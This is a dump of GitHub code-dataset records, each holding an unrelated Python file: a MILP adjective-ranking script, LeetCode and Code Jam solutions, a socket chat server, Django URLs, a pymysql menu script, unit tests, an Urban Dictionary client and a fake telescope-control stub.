wn.synsets(v)])\n return u in v_syns or v in u_syns\n\n\n'''\n @Use: given list of form ['word1-word2', ...]\n output dictonary mapping 'word1-word2' to\n their score, and the normalization constant\n\n to_score :: [String] -> App -> (Dict String Float, Float)\n'''\ndef to_score(pairs,app):\n\n one = app.OneSided\n two = app.TwoSided\n scores = dict()\n\n # compute scores\n for uv in pairs:\n\n [u,v] = uv.split('=')\n s = paper_score(u,v,two)\n scores[uv] = s \n\n\n rescale = [abs(scores[uv]) for uv in scores \\\n if abs(scores[uv]) != 0]\n \n if rescale: rescale = min(rescale)\n else: rescale = 1.0\n\n # normalize scores\n for uv,s in scores.items(): scores[uv] = s/rescale\n\n C = sum(abs(scores[uv]) for uv in scores) * 1000\n\n return (scores, C)\n\n# paper score\ndef paper_score(ai,ak,two):\n w1 = W1(two,ai,ak)\n w2 = W2(two,ai,ak)\n s1 = S1(two,ai,ak)\n s2 = S1(two,ai,ak)\n d = two.data(ai,ak)\n nai = d[ai] + 1\n nak = d[ak] + 1\n\n return ((w1 - s1) - (w2 - s2))/(nai * nak)\n\ndef W1(two,ai,ak):\n P_ws = sum(n for _,n in two.data(ai,ak)['weak-strong']) + 1e-10\n P1 = two.norm()['weak-strong'] + 1e-10\n return P_ws/P1\n\ndef S1(two,ai,ak):\n P_sw = sum(n for _,n in two.data(ai,ak)['strong-weak']) + 1e-10\n P2 = two.norm()['strong-weak'] + 1e-10\n return P_sw/P2\n\ndef W2(two,ai,ak):\n return W1(two,ak,ai)\n\ndef S2(two,ai,ak):\n return S1(two,ak,ai)\n\n\n\n\n\ndef milp_syn(gold,app):\n words = join(gold)\n pairs = [u + '-' + v for u in words for v in words if u != v]\n (scores,C) = to_score(pairs,app)\n\n # build synonym set\n synonyms = [(u,v) for [u,v] in [x.split('=') for x in pairs] \\\n if is_synonym(u,v)]\n '''\n initialize problem\n ''' \n prob = LpProblem('-'.join(words), LpMaximize)\n\n\n '''\n initialize variables\n ''' \n x = dict() # real value of each x_i on [0,1]\n d = dict() # real value of distance between every x_i, x_j, i != j\n w = dict() # integral value where w_ij => i < j\n s = dict() # integral value where s_ij => i > j\n\n for uv in pairs:\n w[uv] = LpVariable('w_' + uv, 0, 1, LpInteger )\n s[uv] = LpVariable('s_' + uv, 0, 1, LpInteger )\n d[uv] = LpVariable('d_' + uv, 0, 1, LpContinuous)\n\n for u in words:\n x[u] = LpVariable('x_' + u, 0, 1, LpContinuous) \n\n '''\n non-synonym and snynonym pairs\n ''' \n\n syn_pairs = [u + '-' + v for u,v in synonyms]\n non_syn_pairs = [uv for uv in pairs if uv not in syn_pairs]\n\n print ('=== ', syn_pairs) \n\n\n '''\n objective function\n '''\n objective = [ (w[ij] - s[ij]) * scores[ij] \\\n for ij in non_syn_pairs ] \\\n + [ -1 * C * (w[ij] + s[ij]) for ij in syn_pairs]\n\n prob += lpSum(objective)\n\n\n '''\n constraints\n '''\n # d_ij = x_j - x_i\n for ij in pairs:\n [i,j] = ij.split('=')\n prob += x[j] - x[i] == d[ij]\n\n # d_ij - w_ij * C <= 0\n for ij in pairs:\n prob += d[ij] - w[ij] * C <= 0\n\n # d_ij + (1 - w_ij) * C > 0\n for ij in pairs:\n prob += d[ij] + (1 - w[ij]) * C >= 0\n\n # d_ij + s_ij * C >= 0\n for ij in pairs:\n prob += d[ij] + s[ij] * C >= 0\n\n # d_ij - (1 - sij) * C < 0\n for ij in pairs:\n prob += d[ij] - (1 - s[ij]) * C <= 0\n\n\n '''\n solve and interpret data\n ''' \n\n prob.solve()\n\n\n algo = prob_to_algo_rank(prob,words)\n\n return {'gold' : gold\n ,'algo' : algo\n ,'tau' : tau (gold,algo)\n ,'tau-max' : tau (gold,gold) # need this since max tau not necessarily 1.0\n ,'tau-notie' : tau2(gold,algo)\n ,'tau-notie-max' : tau2(gold,gold)\n ,'pairwise' : pairwise_accuracy(gold,algo)\n ,'raw-score' : scores\n ,'raw-stat' : dict()\n }\n\n\n\n\n\n\n\n","repo_name":"lingxiao/good-great-ngrams","sub_path":"client/milp.py","file_name":"milp.py","file_ext":"py","file_size_in_byte":8529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72610814121","text":"#Java递归代码实现\n# /**\n# * Definition for a binary tree node.\n# * public class TreeNode {\n# * int val;\n# * TreeNode left;\n# * TreeNode right;\n# * TreeNode(int x) { val = x; }\n# * }\n# */\n# class Solution {\n# public boolean isSameTree(TreeNode p, TreeNode q) {\n# return check(p, q);\n# }\n# public boolean check(TreeNode p, TreeNode q){\n# if (p == null && q==null) return true;\n# if(p==null || q==null) return false;\n# if (p.val != q.val) return false;\n# return check( p.left, q.left) && check(p.right, q.right);\n# }\n\n# }\n#python代码非递归实现\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def isSameTree(self, p, q):\n \"\"\"\n :type p: TreeNode\n :type q: TreeNode\n :rtype: bool\n \"\"\"\n nodequeue= []\n nodequeue.append(p)\n nodequeue.append(q)\n while (nodequeue):\n next1 = nodequeue.pop(0)\n next2 = nodequeue.pop(0) \n if not next1 and not next2:\n continue\n if not next1 or not next2:\n return False\n if next1.val != next2.val:\n return False\n nodequeue.append(next1.left)\n nodequeue.append(next2.left) \n nodequeue.append(next1.right) \n nodequeue.append(next2.right)\n return True\n","repo_name":"ayang818/LeetCode","sub_path":"easy/leetcode100.py","file_name":"leetcode100.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"9347153260","text":"import socket\nfrom threading import Thread\nfrom utils import (obtain_data,\n send_data,\n print_data,)\n\n\nif __name__ == '__main__':\n with socket.socket() as s:\n s.bind(('0.0.0.0', 666))\n s.listen(1)\n connection, ip = s.accept()\n print('ip:{} 已连接'.format(ip))\n t = Thread(target=print_data, args=(connection,))\n t.start()\n while True:\n data = input('')\n if data == '_!exit':\n break\n send_data(data, connection)\n connection.close()\n","repo_name":"KomorebiL/socket-toy","sub_path":"Instant Messenger/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37669216208","text":"import argparse\nimport json\nfrom src.train import train\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--config', type=str, help='path to config file')\nparser.add_argument('--mode', type=str, help='[train/eval/encode]')\nparser.add_argument('--inputs', type=str, help='for \"encode\" mode')\n\n\nargs = parser.parse_args()\n\nwith open(args.config, 'r') as f:\n cfg = json.load(f)\n\nif args.mode == 'train':\n train(cfg)","repo_name":"sebastiani/vae_experiments","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37852362340","text":"\"\"\".\"\"\"\n\nfrom django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^homepage$', views.home), # These endpoints must be different than in-app url\n url(r'^my_info$', views.my_info),\n url(r'^my_shifts$', views.my_shifts),\n url(r'^shifts_exchange$', views.shifts_exchange),\n url(r'^faqBDM$', views.faqBDM),\n url(r'^no_content$', views.no_content),\n url(r'^get_shifts_history$', views.get_shifts_history),\n url(r'^offer_extra_shift$', views.offer_extra_shift),\n url(r'^.*', views.index) # Urls unknown from the server will redirect to index\n]\n","repo_name":"emillumine/third-party","sub_path":"members_space/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21546378491","text":"import gcj\n\nclass Solver(gcj.Solver):\n def _solve_one(self):\n line=self._getstringline()\n a=len(line)*[1]\n first=True\n for letter in \"welcome to code jam\":\n sum = 0\n if first:\n first = False\n prev = 1\n else:\n prev = 0\n for pos,line_let in enumerate(line):\n if letter==line_let:\n sum+=prev\n prev=a[pos]\n a[pos]=sum%10000\n return \"%04d\" % a[-1]\n","repo_name":"dusek/gcj","sub_path":"problems/2009/round0/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"19281681034","text":"# Assignments\n# Assignment 1 - Append .Jr. to the current full_name variable which will result in Erling Haaland Jr.\n#%%\nfirst_name = \"Erling\"\nlast_name = \"Haaland\"\n\nfull_name = first_name + last_name\nprint(full_name)\n\n#%% a. (using the '+' operator)\nfirst_name + \" \" + last_name + \" .Jr\"\n\n# %% b. (using an f-string)\nf\"{first_name} {last_name} .Jr\"\n\n# Assignment 2 - replace the first name of Erling Haaland (Erling) to only the abbreviation of his first hame. This should result in: E. Haaland Jr.\n# %%\nfirst_letter = first_name[0]\nf\"{first_letter}. {last_name} .Jr\"\n\n# Assignment 3 - Create a variable called nationality with the value \"Norway\". Use this variable to create the string (sentence) \"E. Haaland .Jr - Nationality: Norway\". Print out the sentence.\n# %%\nname_abbrv = f\"{first_letter}. {last_name} .Jr\"\nnationality = \"Norway\"\nsentence = f\"{name_abbrv} - Nationality: {nationality}\"\nsentence\n# %%\n","repo_name":"ArieTwigt/python_fundamentals_2023_06_01","sub_path":"assignments_2.py","file_name":"assignments_2.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70409373481","text":"import pymysql\n\n\nclass GetData(object):\n\n def __init__(self):\n self.connect = pymysql.connect(host =\"localhost\", user=\"root\", password=\"a12345\",\n database=\"jingdong\", charset=\"utf8\")\n self.cursor = self.connect.cursor()\n\n def __del__(self):\n\n self.cursor.close()\n self.connect.cursor()\n\n def execute_sql(self, sql_command):\n\n self.cursor.execute(sql_command)\n for item in self.cursor.fetchall():\n print(item)\n\n def show_all_items(self):\n\n sql_command = \"select * from goods;\"\n self.execute_sql(sql_command)\n\n def show_cates(self):\n\n sql_command = \"select name from goods_cates;\"\n self.execute_sql(sql_command)\n\n def show_brands(self):\n\n sql_command = \"select name from goods_brands;\"\n self.execute_sql(sql_command)\n\n def add_cates(self):\n item_name = str(input(\"输入新商品分类的名称:\"))\n sql_command = \"insert into goods_cates (name) values ('{}');\".format(item_name)\n self.cursor.execute(sql_command)\n # self.connect.rollback() 在执行 cursor.execute 时如果出现了错误,可以用这个命令进行回滚,但是主键不会回滚\n self.connect.commit() # 增删改都要添加这一句,目的是使数据写入数据表中\n\n @staticmethod\n def print_menu():\n\n print(\"请选择你要查询的信息\")\n print(\"---------------------------\")\n print(\"1. 查询所有商品信息\")\n print(\"2. 查询所有商品分类\")\n print(\"3. 查询所有商品品牌分类\")\n print(\"4. 添加一个商品分类\")\n return input(\"请输入:\")\n\n def run(self):\n\n while True:\n choose = self.print_menu()\n if choose == \"1\":\n self.show_all_items()\n\n if choose == \"2\":\n self.show_cates()\n\n if choose == \"3\":\n self.show_brands()\n\n if choose == \"4\":\n self.add_cates()\n\n if choose == \"q\" or choose == \"0\":\n exit()\n\n\ndef main():\n jd = GetData()\n jd.run()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"RyanLin1995/python","sub_path":"python_improve/05_MYSQL数据库/02_添加一个商品分类.py","file_name":"02_添加一个商品分类.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30061753717","text":"from typing import Optional, List\nfrom queue import Queue\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def averageOfLevels(self, root: Optional[TreeNode]) -> List[float]:\n q = Queue()\n result = []\n q.put(root)\n\n while not q.empty():\n count = q.qsize()\n sum = 0\n tmp = count\n while tmp:\n curr = q.get()\n sum += curr.val\n\n if curr.left != None:\n q.put(curr.left)\n\n if curr.right != None:\n q.put(curr.right)\n tmp -= 1\n\n result.append(sum / count)\n\n return result\n\n\nsol = Solution()\n\nroot = TreeNode(3)\nroot.left = TreeNode(9)\nroot.right = TreeNode(20)\nroot.right.left = TreeNode(15)\nroot.right.right = TreeNode(7)\nprint(sol.averageOfLevels(root))\n","repo_name":"abhishekxix/algorithms","sub_path":"problems/average-of-levels-bst.py","file_name":"average-of-levels-bst.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3272840051","text":"import torch\nfrom bench.core.executer import Executer\n\n\ndef meshgrid(x, y, row_major=True):\n xx = x.repeat(len(y))\n yy = y.view(-1, 1).repeat(1, len(x)).view(-1)\n if row_major:\n return xx, yy\n else:\n return yy, xx\n\n\ndef grid_anchors(base_anchors, featmap_size, stride, device=\"cuda\"):\n\n feat_h, feat_w = featmap_size\n shift_x = torch.arange(0, feat_w, device=device) * stride\n shift_y = torch.arange(0, feat_h, device=device) * stride\n shift_xx, shift_yy = meshgrid(shift_x, shift_y)\n shifts = torch.stack([shift_xx, shift_yy, shift_xx, shift_yy], dim=-1)\n shifts = shifts.type_as(base_anchors)\n\n all_anchors = base_anchors[None, :, :] + shifts[:, None, :]\n all_anchors = all_anchors.view(-1, 4)\n return all_anchors\n\n\ndef args_adaptor(np_args):\n base_anchors = torch.from_numpy(np_args[0]).cuda()\n\n return [base_anchors, np_args[1], np_args[2]]\n\n\ndef executer_creator():\n return Executer(grid_anchors, args_adaptor)\n","repo_name":"DeepLink-org/DLOP-Bench","sub_path":"bench/samples/long_tail/grid_anchors/torch_impl.py","file_name":"torch_impl.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"18"} +{"seq_id":"32207666652","text":"import os\nimport json\nimport tempfile\nfrom unittest import TestCase\n\nfrom table_minion import web, db\nfrom table_minion.games import Game, Games\nfrom table_minion.players import Player, Players\nfrom table_minion.game_tables import GameTable, GameTables\n\n\nPLAYER_WITH_REG_QUERY = '''\nSELECT name, team, slot, registration_type\nFROM players AS p LEFT JOIN player_registrations AS pr ON p.id=pr.player\nORDER BY p.id, slot;\n'''\n\nGAME_QUERY = '''\nSELECT slot, name, author, system, blurb, min_players, max_players FROM games;\n'''\n\n\nclass TestDB(TestCase):\n def setUp(self):\n self.db_fd, web.app.config['DATABASE'] = tempfile.mkstemp()\n web.app.config['TESTING'] = True\n self.client = web.app.test_client()\n db.init_db(web.app)\n self.rctx = web.app.test_request_context()\n self.rctx.push()\n db.open_db(web.app)\n\n def tearDown(self):\n db.close_db()\n self.rctx.pop()\n os.close(self.db_fd)\n os.unlink(web.app.config['DATABASE'])\n\n def assert_query(self, expected, query, args=()):\n rows = db.query_db(query, args)\n self.assertEqual(expected, map(tuple, rows))\n # row_dicts, [dict(zip(row.keys(), row)) for row in rows])\n\n def test_init_db(self):\n db.query_db('INSERT INTO players (name) VALUES (\"foo\");')\n db.commit_db()\n self.assertNotEqual([], db.query_db('SELECT * FROM players;'))\n\n db.init_db(web.app)\n self.assertNotEqual([], db.query_db('SELECT * FROM players;'))\n\n db.init_db(web.app, clear=True)\n self.assertEqual([], db.query_db('SELECT * FROM players;'))\n\n def test_insert_player(self):\n self.assert_query([], 'SELECT * FROM players;')\n self.assert_query([], 'SELECT * FROM player_registrations;')\n db.insert_player(Player('Gary Gygax', 'TSR', {'1A': 'G'}))\n self.assert_query(\n [('Gary Gygax', 'TSR', '1A', 'G')], PLAYER_WITH_REG_QUERY)\n\n def test_import_players(self):\n db.query_db('INSERT INTO players (name) VALUES (\"foo\");')\n db.commit_db()\n self.assert_query([('foo', None, None, None)], PLAYER_WITH_REG_QUERY)\n\n db.import_players(Players([\n Player('Gary Gygax', 'TSR', {'1A': 'G'}),\n Player('Dave Arneson', None, {'1B': 'P'}),\n ]))\n self.assert_query([\n ('Gary Gygax', 'TSR', '1A', 'G'),\n ('Dave Arneson', None, '1B', 'P'),\n ], PLAYER_WITH_REG_QUERY)\n\n def test_get_players(self):\n self.assertEqual([], list(db.get_players()))\n db.import_players(Players([\n Player('Gary Gygax', 'TSR', {'1A': 'G'}),\n Player('Dave Arneson', None, {'1B': 'P'}),\n ]))\n players = db.get_players()\n self.assertTrue(isinstance(players, Players))\n self.assertEqual(list(players), [\n Player('Gary Gygax', 'TSR', {'1A': 'G'}),\n Player('Dave Arneson', None, {'1B': 'P'}),\n ])\n\n def test_get_players_for_game(self):\n db.import_players(Players([\n Player('Gary Gygax', 'TSR', {'1A': 'G'}),\n Player('Dave Arneson', None, {'1A': 'P', '2A': 'X'}),\n Player('Jane Bloggs', None, {'2A': 'P'}),\n ]))\n players = db.get_players_for_game('1A')\n self.assertTrue(isinstance(players, Players))\n self.assertEqual(list(players), [\n Player('Gary Gygax', 'TSR', {'1A': 'G'}),\n Player('Dave Arneson', None, {'1A': 'P'}),\n ])\n\n def test_get_player(self):\n db.import_players(Players([\n Player('Gary Gygax', 'TSR', {'1A': 'G', '2A': 'G'}),\n Player('Dave Arneson', None, {'1A': 'P'}),\n ]))\n self.assertRaises(db.NotFound, db.get_player, 'foo')\n self.assertEqual(\n db.get_player('Gary Gygax'),\n Player('Gary Gygax', 'TSR', {'1A': 'G', '2A': 'G'}))\n\n def test_insert_game(self):\n self.assert_query([], 'SELECT * FROM games;')\n db.insert_game(Game(\n '1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 4, 6))\n self.assert_query(\n [('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 4, 6)],\n GAME_QUERY)\n\n def test_import_games(self):\n db.insert_game(Game(\n '1X', 'Game 1X', 'Author 1X', 'System 1X', 'Blurb 1X', 4, 6))\n db.commit_db()\n self.assert_query(\n [('1X', 'Game 1X', 'Author 1X', 'System 1X', 'Blurb 1X', 4, 6)],\n GAME_QUERY)\n\n db.import_games(Games([\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 4, 6),\n Game('1B', 'Game 1B', 'Author 1B', 'System 1B', 'Blurb 1B', 4, 6),\n ]))\n self.assert_query([\n ('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 4, 6),\n ('1B', 'Game 1B', 'Author 1B', 'System 1B', 'Blurb 1B', 4, 6),\n ], GAME_QUERY)\n\n def test_get_games(self):\n self.assertEqual([], list(db.get_games()))\n db.import_games(Games([\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 4, 6),\n Game('1B', 'Game 1B', 'Author 1B', 'System 1B', 'Blurb 1B', 4, 6),\n ]))\n games = db.get_games()\n self.assertTrue(isinstance(games, Games))\n self.assertEqual(list(games), [\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 4, 6),\n Game('1B', 'Game 1B', 'Author 1B', 'System 1B', 'Blurb 1B', 4, 6),\n ])\n\n def test_get_game(self):\n db.import_games(Games([\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 4, 6),\n Game('1B', 'Game 1B', 'Author 1B', 'System 1B', 'Blurb 1B', 4, 6),\n ]))\n self.assertRaises(db.NotFound, db.get_game, '9X')\n self.assertEqual(\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 4, 6),\n db.get_game('1A'))\n\n def test_set_game_tables(self):\n games = Games([\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 1, 2),\n ])\n players = Players([\n Player('Gary Gygax', 'TSR', {'1A': 'G'}),\n Player('Dave Arneson', None, {'1A': 'P'}),\n ])\n game_table = GameTable(\n games['1A'], list(players)[0], list(players)[1:])\n\n self.assert_query([], 'SELECT slot, data FROM game_tables')\n db.set_game_tables('1A', [game_table])\n self.assert_query(\n [('1A', json.dumps(game_table.table_data_dict()))],\n 'SELECT slot, data FROM game_tables')\n\n def test_get_game_tables(self):\n games = Games([\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 1, 2),\n ])\n players = Players([\n Player('Gary Gygax', 'TSR', {'1A': 'G'}),\n Player('Dave Arneson', None, {'1A': 'P'}),\n ])\n self.assertEqual([], db.get_game_tables('1A', games['1A'], players))\n\n db.query_db(\n 'INSERT INTO game_tables (slot, data) VALUES (?, ?);',\n ('1A', '{\"gm\": \"Gary Gygax\", \"players\": [\"Dave Arneson\"]}'))\n game_table = GameTable(\n games['1A'], list(players)[0], list(players)[1:])\n self.assertEqual(\n [game_table], db.get_game_tables('1A', games['1A'], players))\n\n def test_set_all_game_tables(self):\n games = Games([\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 1, 2),\n Game('2A', 'Game 2A', 'Author 2A', 'System 2A', 'Blurb 2A', 1, 2),\n ])\n players = Players([\n Player('Gary Gygax', 'TSR', {'1A': 'G', '2A': 'G'}),\n Player('Dave Arneson', None, {'1A': 'P', '2A': 'P'}),\n ])\n table1 = GameTable(games['1A'], list(players)[0], list(players)[1:])\n table2 = GameTable(games['2A'], list(players)[0], list(players)[1:])\n game_tables = GameTables(\n games, players, {'1A': [table1], '2A': [table2]})\n\n self.assert_query([], 'SELECT slot, data FROM game_tables')\n db.set_all_game_tables(game_tables)\n self.assert_query([\n ('1A', json.dumps(table1.table_data_dict())),\n ('2A', json.dumps(table2.table_data_dict())),\n ], 'SELECT slot, data FROM game_tables')\n\n def test_get_all_game_tables(self):\n games = Games([\n Game('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 1, 2),\n Game('2A', 'Game 2A', 'Author 2A', 'System 2A', 'Blurb 2A', 1, 2),\n ])\n players = Players([\n Player('Gary Gygax', 'TSR', {'1A': 'G', '2A': 'G'}),\n Player('Dave Arneson', None, {'1A': 'P', '2A': 'P'}),\n ])\n self.assertEqual([], db.get_game_tables('1A', games['1A'], players))\n\n db.query_db(\n 'INSERT INTO game_tables (slot, data) VALUES (?, ?);',\n ('1A', '{\"gm\": \"Gary Gygax\", \"players\": [\"Dave Arneson\"]}'))\n db.query_db(\n 'INSERT INTO game_tables (slot, data) VALUES (?, ?);',\n ('2A', '{\"gm\": \"Gary Gygax\", \"players\": [\"Dave Arneson\"]}'))\n game_tables = db.get_all_game_tables(games, players)\n self.assertEqual(list(game_tables.all_tables()), [\n GameTable(games['1A'], list(players)[0], list(players)[1:]),\n GameTable(games['2A'], list(players)[0], list(players)[1:]),\n ])\n","repo_name":"jerith/table-minion","sub_path":"table_minion/tests/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":9309,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"27201501334","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom PyQt4 import QtCore, QtGui\n\nclass Node:\n def __init__(self, data, parent=None):\n self.data=data\n self.parent=parent\n self.children=[]\n\n def addChild(self, data):\n node=Node(data, self)\n self.children.append(node)\n return node\n\n def row(self):\n if self.parent:\n return self.parent.children.index(self)\n else:\n return 0\n\nclass MyModel(QtCore.QAbstractItemModel):\n def __init__(self, parent=None):\n QtCore.QAbstractItemModel.__init__(self, parent)\n # rootノード(表示される最上位のもうひとつ上の階層になる)\n self.root=Node([QtCore.QVariant(\"Title\")]) \n self.setupTree(self.root)\n\n def setupTree(self, node):\n # 1階層\n current=node.addChild([self.trUtf8(\"日本\")])\n # 2階層\n current=current.addChild([self.trUtf8(\"関東\")])\n # 3階層\n current.addChild([self.trUtf8(\"茨城県\")])\n current.addChild([self.trUtf8(\"栃木県\")])\n current.addChild([self.trUtf8(\"群馬県\")])\n current.addChild([self.trUtf8(\"埼玉県\")])\n current.addChild([self.trUtf8(\"千葉県\")])\n current.addChild([self.trUtf8(\"東京都\")])\n current.addChild([self.trUtf8(\"神奈川県\")])\n\n def columnCount(self, parent):\n if parent.isValid():\n # parent.internalPointer()でNodeクラスインスタンスにアクセスする\n return len(parent.internalPointer().data)\n else:\n # header\n return len(self.root.data)\n\n def data(self, index, role):\n if not index.isValid():\n return QtCore.QVariant()\n\n if role != QtCore.Qt.DisplayRole:\n return QtCore.QVariant()\n\n return QtCore.QVariant(index.internalPointer().data[index.column()])\n\n def flags(self, index):\n if not index.isValid():\n return QtCore.Qt.ItemIsEnabled\n\n return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable\n\n def headerData(self, section, orientation, role):\n if orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:\n return self.root.data[section]\n\n return QtCore.QVariant()\n\n def index(self, row, column, parent):\n if row < 0 or column < 0 or row >= self.rowCount(parent) or column >= self.columnCount(parent):\n return QtCore.QModelIndex()\n\n if not parent.isValid():\n parentItem = self.root\n else:\n parentItem = parent.internalPointer()\n\n childItem = parentItem.children[row]\n if childItem:\n return self.createIndex(row, column, childItem)\n else:\n return QtCore.QModelIndex()\n\n def parent(self, index):\n if not index.isValid():\n return QtCore.QModelIndex()\n\n childItem = index.internalPointer()\n parentItem = childItem.parent\n\n if parentItem == self.root:\n return QtCore.QModelIndex()\n\n return self.createIndex(parentItem.row(), 0, parentItem)\n\n def rowCount(self, parent):\n if parent.column() > 0:\n return 0\n\n if not parent.isValid():\n parentItem = self.root\n else:\n parentItem = parent.internalPointer()\n\n return len(parentItem.children)\n\n\nclass MyWidget(QtGui.QMainWindow):\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n tree = QtGui.QTreeView(self)\n model=MyModel(self)\n tree.setModel(model)\n self.setCentralWidget(tree)\n\nif __name__==\"__main__\":\n app = QtGui.QApplication(sys.argv)\n widget = MyWidget()\n widget.show()\n sys.exit(app.exec_())","repo_name":"hdkkato/qtsample","sub_path":"qtreeview/sample2.py","file_name":"sample2.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72906526179","text":"import requests\n\nURL = \"http://api.urbandictionary.com/v0/define\"\n\nclass UrbanDefinition:\n\tdef __init__(self, term, definition, example=\"\"):\n\t\tself.term = term\n\t\tself.definition = definition\n\t\tself.example = example\n\n\tdef to_string(self):\n\t\treturn f\"{self.term}:\\n{self.definition}\\nExample: {self.example}\\n\\n\"\n\nclass UrbanDictionaryError(Exception):\n\tpass\n\ndef get_definition(term):\n\tr = requests.get(URL, params={\"term\": term})\n\ttry:\n\t\tjson = r.json()\n\texcept ValueError as e:\n\t\traise UrbanDictionaryError(f\"Error parsing json response. {e}\")\n\ttry:\n\t\tres = []\n\t\tfor entry in json[\"list\"]:\n\t\t\ttemp = UrbanDefinition(entry[\"word\"], entry[\"definition\"], entry[\"example\"])\n\t\t\tres.append(temp)\n\texcept KeyError as e:\n\t\traise UrbanDictionaryError(f\"Error parsing result: {e}\")\n\treturn res\n\n","repo_name":"TheQuinbox/lookup","sub_path":"plugins/urban_dictionary/ud/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17365836486","text":"\"\"\"\nFake enough of SAL to let my write a notebook illustrating auxTel scripting\n\"\"\"\n\n__all__ = [\"Command\", \"camera_command_turnOnLaserC\", \"camera_command_setFilterC\"]\n\nimport asyncio\nimport logging\nimport sys\nimport time\n\nclass Command():\n ACK = 300\n INPROGRESS = 301\n STALLED = 302\n COMPLETE = 303\n NOPERM = -300\n NOACK = -301\n FAILED = -302\n ABORTED = -303\n TIMEOUT = -304\n \n def __init__(self, cmdName):\n self._cmdName = cmdName\n\nclass SAL_camera():\n __cmdId = -1\n \n def __init__(self):\n self._commands = dict()\n self._pending = dict()\n\n def salShutdown(self):\n pass\n\n def __getCmdId(self, cmdName):\n if not cmdName in self._commands:\n raise NameError(\"Unknown SAL command \\\"%s\\\"\" % cmdName)\n\n self.__cmdId += 1\n return self.__cmdId\n\n def salCommand(self, cmdName):\n self._commands[cmdName] = Command(cmdName)\n\n def salEvent(self, name):\n pass\n #\n # Commands\n #\n def issueCommand_setFilter(self, data):\n cmdId = self.__getCmdId(data.cmdName)\n self._pending[cmdId] = data\n\n print(\"%s Setting %s\" % (time.asctime(), self._pending[cmdId].filterName), file=sys.stderr)\n sys.stderr.flush()\n\n return cmdId\n\n def waitForCompletion_setFilter(self, cmdId, timeout=0):\n if not cmdId in self._pending:\n raise NameError(\"Command %d not found\" % cmdId)\n\n time.sleep(1.5)\n print(\"%s Set filter to %s\" % (time.asctime(), self._pending[cmdId].filterName), file=sys.stderr)\n sys.stderr.flush()\n del self._pending[cmdId]\n\n return Command.COMPLETE\n \n async def awaitForCompletion_setFilter(self, cmdId, timeout=0):\n if not cmdId in self._pending:\n raise NameError(\"Command %d not found\" % cmdId)\n\n await asyncio.sleep(1.5)\n\n print(\"%s Set filter to %s\" % (time.asctime(), self._pending[cmdId].filterName), file=sys.stderr)\n sys.stderr.flush()\n del self._pending[cmdId]\n\n return Command.COMPLETE\n \n def issueCommand_turnOnLaser(self, data):\n cmdId = self.__getCmdId(data.cmdName)\n self._pending[cmdId] = data\n\n print(\"%s turning laser on\" % (time.asctime()), file=sys.stderr)\n sys.stderr.flush()\n\n return cmdId\n\n def waitForCompletion_turnOnLaser(self, cmdId, timeout=0):\n if not cmdId in self._pending:\n raise NameError(\"Command %d not found\" % cmdId)\n\n time.sleep(2)\n print(\"%s laser is warm\" % (time.asctime()), file=sys.stderr)\n sys.stderr.flush()\n del self._pending[cmdId]\n\n return Command.COMPLETE\n\n async def awaitForCompletion_turnOnLaser(self, cmdId, timeout=0):\n if not cmdId in self._pending:\n raise 